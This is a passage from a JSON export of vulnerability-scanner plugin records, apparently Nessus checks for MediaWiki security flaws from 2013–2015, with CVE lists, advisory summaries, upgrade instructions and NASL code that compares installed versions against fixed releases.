script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n script_cwe_id(20, 74, 79, 442, 629, 711, 712, 722, 725, 750, 751, 800, 801, 809, 811, 864, 900, 928, 931, 990);\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2013/06/17\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/01/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/02/06\");\n\n 
script_set_attribute(attribute:\"potential_vulnerability\", value:\"true\");\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:mediawiki:mediawiki\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"mediawiki_detect.nasl\");\n script_require_keys(\"Settings/ParanoidReport\", \"installed_sw/MediaWiki\", \"www/PHP\");\n script_require_ports(\"Services/www\", 80);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\ninclude(\"install_func.inc\");\n\napp = \"MediaWiki\";\nget_install_count(app_name:app, exit_if_zero:TRUE);\n\nport = get_http_port(default:80, php:TRUE);\n\ninstall = get_single_install(\n app_name : app,\n port : port,\n exit_if_unknown_ver : TRUE\n);\nversion = install['version'];\ninstall_url = build_url(qs:install['path'], port:port);\n\nif (report_paranoia < 2) audit(AUDIT_PARANOID);\n\nif (\n version =~ \"^1\\.19\\.[0-9]([^0-9]|$)\" ||\n version =~ \"^1\\.21\\.[0-3]([^0-9]|$)\" ||\n version =~ \"^1\\.22\\.[0]([^0-9]|$)\"\n)\n{\n set_kb_item(name:'www/'+port+'/XSS', value:TRUE);\n set_kb_item(name:'www/'+port+'/XSRF', value:TRUE);\n\n if (report_verbosity > 0)\n {\n report =\n '\\n URL : ' + install_url +\n '\\n Installed version : ' + version +\n '\\n Fixed versions : 1.19.10 / 1.21.4 / 1.22.1' +\n '\\n';\n security_hole(port:port, extra:report);\n }\n else security_hole(port);\n}\nelse audit(AUDIT_WEB_APP_NOT_AFFECTED, app, install_url, version);\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-08-19T12:48:53", "description": "It was discovered that MediaWiki, a website engine for 
collaborative work, is vulnerable to JSONP injection in Flash (CVE-2014-5241 ) and clickjacking between OutputPage and ParserOutput (CVE-2014-5243 ). The vulnerabilities are addressed by upgrading MediaWiki to the new upstream version 1.19.18, which includes additional changes.", "cvss3": {"score": null, "vector": null}, "published": "2014-08-25T00:00:00", "type": "nessus", "title": "Debian DSA-3011-1 : mediawiki - security update", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-5241", "CVE-2014-5243"], "modified": "2021-01-11T00:00:00", "cpe": ["p-cpe:/a:debian:debian_linux:mediawiki", "cpe:/o:debian:debian_linux:7.0"], "id": "DEBIAN_DSA-3011.NASL", "href": "https://www.tenable.com/plugins/nessus/77358", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Debian Security Advisory DSA-3011. The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(77358);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2014-5241\", \"CVE-2014-5243\");\n script_bugtraq_id(69136, 69137);\n script_xref(name:\"DSA\", value:\"3011\");\n\n script_name(english:\"Debian DSA-3011-1 : mediawiki - security update\");\n script_summary(english:\"Checks dpkg output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"It was discovered that MediaWiki, a website engine for collaborative\nwork, is vulnerable to JSONP injection in Flash (CVE-2014-5241 ) and\nclickjacking between OutputPage and ParserOutput (CVE-2014-5243 ). 
The\nvulnerabilities are addressed by upgrading MediaWiki to the new\nupstream version 1.19.18, which includes additional changes.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=752622\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=758510\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2014-5241\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2014-5243\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/wheezy/mediawiki\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.debian.org/security/2014/dsa-3011\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Upgrade the mediawiki packages.\n\nFor the stable distribution (wheezy), these problems have been fixed\nin version 1:1.19.18+dfsg-0+deb7u1.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:ND/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:mediawiki\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:7.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/08/23\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/08/25\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2021 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"7.0\", prefix:\"mediawiki\", reference:\"1:1.19.18+dfsg-0+deb7u1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:deb_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-08-19T12:50:55", "description": "The remote Debian host is missing a security update. It is, therefore, affected by multiple vulnerabilities in MediaWiki :\n\n - A cross-site scripting (XSS) vulnerability exists due to a failure to validate input before returning it to the user. An unauthenticated, remote attacker can exploit this, via specially crafted SVG files, to execute arbitrary script code in the user's browser session.\n (CVE-2013-2031)\n\n - A flaw exists in the password blocking mechanism due to two different tools being used to block password change requests, these being Special:PasswordReset and Special:ChangePassword, either of which may be bypassed by the method the other prevents. A remote attacker can exploit this issue to change passwords. (CVE-2013-2032)\n\n - Multiple flaws exist in Sanitizer::checkCss due to the improper sanitization of user-supplied input. An unauthenticated, remote attacker can exploit these to bypass the blacklist. 
(CVE-2013-4567, CVE-2013-4568)\n\n - A flaw exists due to multiple users being granted the same session ID within HTTP headers. A remote attacker can exploit this to authenticate as another random user. (CVE-2013-4572)\n\n - A cross-site scripting (XSS) vulnerability exists in the /includes/libs/XmlTypeCheck.php script due to improper validation of user-supplied input. An unauthenticated, remote attacker can exploit this, via a specially crafted XSL file, to execute arbitrary script code in the user's browser session. (CVE-2013-6452)\n\n - A flaw exists in the /includes/upload/UploadBase.php script due to a failure to apply SVG sanitization when XML files are read as invalid. An unauthenticated, remote attacker can exploit this to upload non-sanitized XML files, resulting in an unspecified impact.\n (CVE-2013-6453)\n\n - A stored cross-site scripting (XSS) vulnerability exists in the /includes/Sanitizer.php script due to a failure to properly validate the '-o-link' attribute before returning it to users. An unauthenticated, remote attacker can exploit this, via a specially crafted request, to execute arbitrary script code in the user's browser session. (CVE-2013-6454)\n\n - A flaw exists in the log API within the /includes/api/ApiQueryLogEvents.php script that allows an unauthenticated, remote attacker to disclose potentially sensitive information regarding deleted pages. (CVE-2013-6472)\n\n - Multiple flaws exist in the PdfHandler_body.php, DjVu.php, Bitmap.php, and ImageHandler.php scripts when DjVu or PDF file upload support is enabled due to improper sanitization of user-supplied input. An authenticated, remote attacker can exploit these, via the use of shell metacharacters, to execute arbitrary shell commands. (CVE-2014-1610)\n\n - A cross-site request forgery (XSRF) vulnerability exists in the includes/specials/SpecialChangePassword.php script due to a failure to properly handle a correctly authenticated but unintended login attempt. 
An unauthenticated, remote attacker, by convincing a user to follow a specially crafted link, can exploit this to reset the user's password. (CVE-2014-2665)", "cvss3": {"score": null, "vector": null}, "published": "2014-03-31T00:00:00", "type": "nessus", "title": "Debian DSA-2891-1 : mediawiki, mediawiki-extensions Multiple Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2013-2031", "CVE-2013-2032", "CVE-2013-4567", "CVE-2013-4568", "CVE-2013-4572", "CVE-2013-6452", "CVE-2013-6453", "CVE-2013-6454", "CVE-2013-6472", "CVE-2014-1610", "CVE-2014-2665"], "modified": "2021-01-11T00:00:00", "cpe": ["p-cpe:/a:debian:debian_linux:mediawiki", "p-cpe:/a:debian:debian_linux:mediawiki-extensions", "cpe:/o:debian:debian_linux:7.0"], "id": "DEBIAN_DSA-2891.NASL", "href": "https://www.tenable.com/plugins/nessus/73256", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The package checks in this plugin were\n# extracted from Debian Security Advisory DSA-2891\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(73256);\n script_version(\"1.16\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\n \"CVE-2013-2031\",\n \"CVE-2013-2032\",\n \"CVE-2013-4567\",\n \"CVE-2013-4568\",\n \"CVE-2013-4572\",\n \"CVE-2013-6452\",\n \"CVE-2013-6453\",\n \"CVE-2013-6454\",\n \"CVE-2013-6472\",\n \"CVE-2014-1610\",\n \"CVE-2014-2665\"\n );\n script_bugtraq_id(\n 59594,\n 59595,\n 63757,\n 63760,\n 63761,\n 65003,\n 65223,\n 66600\n );\n script_xref(name:\"DSA\", value:\"2891\");\n\n script_name(english:\"Debian DSA-2891-1 : mediawiki, mediawiki-extensions Multiple Vulnerabilities\");\n script_summary(english:\"Checks the dpkg output for the updated packages.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Debian host is missing a security-related update.\");\n 
script_set_attribute(attribute:\"description\", value:\n\"The remote Debian host is missing a security update. It is, therefore,\naffected by multiple vulnerabilities in MediaWiki :\n\n - A cross-site scripting (XSS) vulnerability exists due to\n a failure to validate input before returning it to the\n user. An unauthenticated, remote attacker can exploit\n this, via specially crafted SVG files, to execute\n arbitrary script code in the user's browser session.\n (CVE-2013-2031)\n\n - A flaw exists in the password blocking mechanism due to\n two different tools being used to block password change\n requests, these being Special:PasswordReset and\n Special:ChangePassword, either of which may be bypassed\n by the method the other prevents. A remote attacker can\n exploit this issue to change passwords. (CVE-2013-2032)\n\n - Multiple flaws exist in Sanitizer::checkCss due to the\n improper sanitization of user-supplied input. An\n unauthenticated, remote attacker can exploit these to\n bypass the blacklist. (CVE-2013-4567, CVE-2013-4568)\n\n - A flaw exists due to multiple users being granted the\n same session ID within HTTP headers. A remote attacker\n can exploit this to authenticate as another random\n user. (CVE-2013-4572)\n\n - A cross-site scripting (XSS) vulnerability exists in the\n /includes/libs/XmlTypeCheck.php script due to improper\n validation of user-supplied input. An unauthenticated,\n remote attacker can exploit this, via a specially\n crafted XSL file, to execute arbitrary script code in\n the user's browser session. (CVE-2013-6452)\n\n - A flaw exists in the /includes/upload/UploadBase.php\n script due to a failure to apply SVG sanitization when\n XML files are read as invalid. 
An unauthenticated,\n remote attacker can exploit this to upload non-sanitized\n XML files, resulting in an unspecified impact.\n (CVE-2013-6453)\n\n - A stored cross-site (XSS) scripting vulnerability exists\n in the /includes/Sanitizer.php script due to a failure\n to properly validate the '-o-link' attribute before\n returning it to users. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n request, to execute arbitrary script code in the user's\n browser session. (CVE-2013-6454)\n\n - A flaw exists in the log API within the\n /includes/api/ApiQueryLogEvents.php script that allows\n an unauthenticated, remote attacker to disclose\n potentially sensitive information regarding deleted\n pages. (CVE-2013-6472)\n\n - Multiple flaws exist in the PdfHandler_body.php,\n DjVu.php, Bitmap.php, and ImageHandler.php scripts when\n DjVu or PDF file upload support is enabled due to\n improper sanitization of user-supplied input. An\n authenticated, remote attacker can exploit these, via\n the use of shell metacharacters, to execute execute\n arbitrary shell commands. (CVE-2014-1610)\n\n - A cross-site request forgery (XSRF) vulnerability exists\n in the includes/specials/SpecialChangePassword.php\n script due to a failure to properly handle a correctly\n authenticated but unintended login attempt. An\n unauthenticated, remote attacker, by convincing a user\n to follow a specially crafted link, can exploit this to\n reset the user's password. 
(CVE-2014-2665)\");\n script_set_attribute(attribute:\"see_also\", value:\"http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=729629\");\n script_set_attribute(attribute:\"see_also\", value:\"http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=706601\");\n script_set_attribute(attribute:\"see_also\", value:\"http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=742857\");\n script_set_attribute(attribute:\"see_also\", value:\"http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=742857\");\n script_set_attribute(attribute:\"see_also\", value:\"https://security-tracker.debian.org/tracker/CVE-2013-2031\");\n script_set_attribute(attribute:\"see_also\", value:\"https://security-tracker.debian.org/tracker/CVE-2013-2032\");\n script_set_attribute(attribute:\"see_also\", value:\"https://security-tracker.debian.org/tracker/CVE-2013-4567\");\n script_set_attribute(attribute:\"see_also\", value:\"https://security-tracker.debian.org/tracker/CVE-2013-4568\");\n script_set_attribute(attribute:\"see_also\", value:\"https://security-tracker.debian.org/tracker/CVE-2013-4572\");\n script_set_attribute(attribute:\"see_also\", value:\"https://security-tracker.debian.org/tracker/CVE-2013-6452\");\n script_set_attribute(attribute:\"see_also\", value:\"https://security-tracker.debian.org/tracker/CVE-2013-6453\");\n script_set_attribute(attribute:\"see_also\", value:\"https://security-tracker.debian.org/tracker/CVE-2013-6454\");\n script_set_attribute(attribute:\"see_also\", value:\"https://security-tracker.debian.org/tracker/CVE-2013-6472\");\n script_set_attribute(attribute:\"see_also\", value:\"https://security-tracker.debian.org/tracker/CVE-2014-1610\");\n script_set_attribute(attribute:\"see_also\", value:\"https://security-tracker.debian.org/tracker/CVE-2014-2665\");\n script_set_attribute(attribute:\"see_also\", value:\"https://packages.debian.org/source/wheezy/mediawiki\");\n script_set_attribute(attribute:\"see_also\", 
value:\"https://packages.debian.org/source/wheezy/mediawiki-extensions\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www.debian.org/security/2014/dsa-2891\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade the mediawiki packages. For the stable distribution (wheezy),\nthese issues have been fixed in version 1:1.19.14+dfsg-0+deb7u1 of the\nmediawiki package and version 3.5~deb7u1 of the mediawiki-extensions\npackage.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"d2_elliot_name\", value:\"MediaWiki thumb.php page Parameter Remote Shell Command Injection\");\n script_set_attribute(attribute:\"exploit_framework_d2_elliot\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'MediaWiki Thumb.php Remote Command Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/03/30\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/03/30\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/03/31\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:mediawiki\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:mediawiki-extensions\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:7.0\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Debian Local Security Checks\");\n\n 
script_copyright(english:\"This script is Copyright (C) 2014-2021 Tenable Network Security, Inc.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\ninclude(\"misc_func.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\noslevel = get_kb_item(\"Host/Debian/release\"); \nif (empty_or_null(oslevel)) audit(AUDIT_OS_NOT, \"Debian\");\nif (oslevel !~ \"^7\\.\") audit(AUDIT_OS_NOT, \"Debian 7\", \"Debian \" + oslevel);\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"7.0\", prefix:\"mediawiki\", reference:\"1:1.19.14+dfsg-0+deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"mediawiki-extensions\", reference:\"3.5~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"mediawiki-extensions-base\", reference:\"3.5~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"mediawiki-extensions-collection\", reference:\"3.5~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"mediawiki-extensions-geshi\", reference:\"3.5~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"mediawiki-extensions-graphviz\", reference:\"3.5~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"mediawiki-extensions-ldapauth\", reference:\"3.5~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"mediawiki-extensions-openid\", reference:\"3.5~deb7u1\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n xss : TRUE,\n xsrf : TRUE,\n extra : deb_report_get()\n );\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-08-19T12:46:56", "description": "The remote host is affected by the vulnerability described in GLSA-201502-04 (MediaWiki: Multiple 
vulnerabilities)\n\n Multiple vulnerabilities have been discovered in MediaWiki. Please review the CVE identifiers and MediaWiki announcement referenced below for details.\n Impact :\n\n A remote attacker may be able to execute arbitrary code with the privileges of the process, create a Denial of Service condition, obtain sensitive information, bypass security restrictions, and inject arbitrary web script or HTML.\n Workaround :\n\n There is no known workaround at this time.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2015-02-09T00:00:00", "type": "nessus", "title": "GLSA-201502-04 : MediaWiki: Multiple vulnerabilities", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2013-6451", "CVE-2013-6452", "CVE-2013-6453", "CVE-2013-6454", "CVE-2013-6472", "CVE-2014-1610", "CVE-2014-2242", "CVE-2014-2243", "CVE-2014-2244", "CVE-2014-2665", "CVE-2014-2853", "CVE-2014-5241", "CVE-2014-5242", "CVE-2014-5243", "CVE-2014-7199", "CVE-2014-7295", "CVE-2014-9276", "CVE-2014-9277", "CVE-2014-9475", "CVE-2014-9476", "CVE-2014-9477", "CVE-2014-9478", "CVE-2014-9479", "CVE-2014-9480", "CVE-2014-9481", "CVE-2014-9487", "CVE-2014-9507"], "modified": "2021-01-11T00:00:00", "cpe": ["p-cpe:/a:gentoo:linux:mediawiki", "cpe:/o:gentoo:linux"], "id": "GENTOO_GLSA-201502-04.NASL", "href": "https://www.tenable.com/plugins/nessus/81227", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Gentoo Linux Security Advisory GLSA 201502-04.\n#\n# The advisory text is Copyright (C) 2001-2019 Gentoo Foundation, Inc.\n# and licensed under the Creative Commons - Attribution / Share Alike \n# license. 
See http://creativecommons.org/licenses/by-sa/3.0/\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(81227);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2013-6451\", \"CVE-2013-6452\", \"CVE-2013-6453\", \"CVE-2013-6454\", \"CVE-2013-6472\", \"CVE-2014-1610\", \"CVE-2014-2242\", \"CVE-2014-2243\", \"CVE-2014-2244\", \"CVE-2014-2665\", \"CVE-2014-2853\", \"CVE-2014-5241\", \"CVE-2014-5242\", \"CVE-2014-5243\", \"CVE-2014-7199\", \"CVE-2014-7295\", \"CVE-2014-9276\", \"CVE-2014-9277\", \"CVE-2014-9475\", \"CVE-2014-9476\", \"CVE-2014-9477\", \"CVE-2014-9478\", \"CVE-2014-9479\", \"CVE-2014-9480\", \"CVE-2014-9481\", \"CVE-2014-9487\", \"CVE-2014-9507\");\n script_xref(name:\"GLSA\", value:\"201502-04\");\n\n script_name(english:\"GLSA-201502-04 : MediaWiki: Multiple vulnerabilities\");\n script_summary(english:\"Checks for updated package(s) in /var/db/pkg\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Gentoo host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The remote host is affected by the vulnerability described in GLSA-201502-04\n(MediaWiki: Multiple vulnerabilities)\n\n Multiple vulnerabilities have been discovered in MediaWiki. 
Please\n review the CVE identifiers and MediaWiki announcement referenced below\n for details.\n \nImpact :\n\n A remote attacker may be able to execute arbitrary code with the\n privileges of the process, create a Denial of Service condition, obtain\n sensitive information, bypass security restrictions, and inject arbitrary\n web script or HTML.\n \nWorkaround :\n\n There is no known workaround at this time.\"\n );\n # https://lists.wikimedia.org/pipermail/mediawiki-announce/2014-June/000155.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?4ef35312\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security.gentoo.org/glsa/201502-04\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"All MediaWiki 1.23 users should upgrade to the latest version:\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=www-apps/mediawiki-1.23.8'\n All MediaWiki 1.22 users should upgrade to the latest version:\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=www-apps/mediawiki-1.22.15'\n All MediaWiki 1.19 users should upgrade to the latest version:\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=www-apps/mediawiki-1.19.23'\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"d2_elliot_name\", value:\"MediaWiki thumb.php page Parameter Remote Shell Command Injection\");\n script_set_attribute(attribute:\"exploit_framework_d2_elliot\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'MediaWiki Thumb.php Remote Command Execution');\n 
script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:mediawiki\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:gentoo:linux\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/01/30\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/02/07\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/02/09\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Gentoo Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Gentoo/release\", \"Host/Gentoo/qpkg-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"qpkg.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Gentoo/release\")) audit(AUDIT_OS_NOT, \"Gentoo\");\nif (!get_kb_item(\"Host/Gentoo/qpkg-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (qpkg_check(package:\"www-apps/mediawiki\", unaffected:make_list(\"ge 1.23.8\", \"rge 1.22.15\", \"rge 1.19.23\"), vulnerable:make_list(\"lt 1.23.8\"))) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:qpkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = qpkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"MediaWiki\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-08-19T12:51:04", "description": "- Update 
to 1.21.5\n\n - (bug 60339) (CVE-2014-1610) SECURITY: Reported RCE in djvu thumbnailing\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"score": null, "vector": null}, "published": "2014-02-07T00:00:00", "type": "nessus", "title": "Fedora 20 : mediawiki-1.21.5-1.fc20 (2014-1745)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-1610"], "modified": "2021-01-11T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:mediawiki", "cpe:/o:fedoraproject:fedora:20"], "id": "FEDORA_2014-1745.NASL", "href": "https://www.tenable.com/plugins/nessus/72376", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2014-1745.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(72376);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2014-1610\");\n script_bugtraq_id(65223);\n script_xref(name:\"FEDORA\", value:\"2014-1745\");\n\n script_name(english:\"Fedora 20 : mediawiki-1.21.5-1.fc20 (2014-1745)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\" - Update to 1.21.5\n\n - (bug 60339) (CVE-2014-1610) SECURITY: Reported RCE in\n djvu thumbnailing\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. 
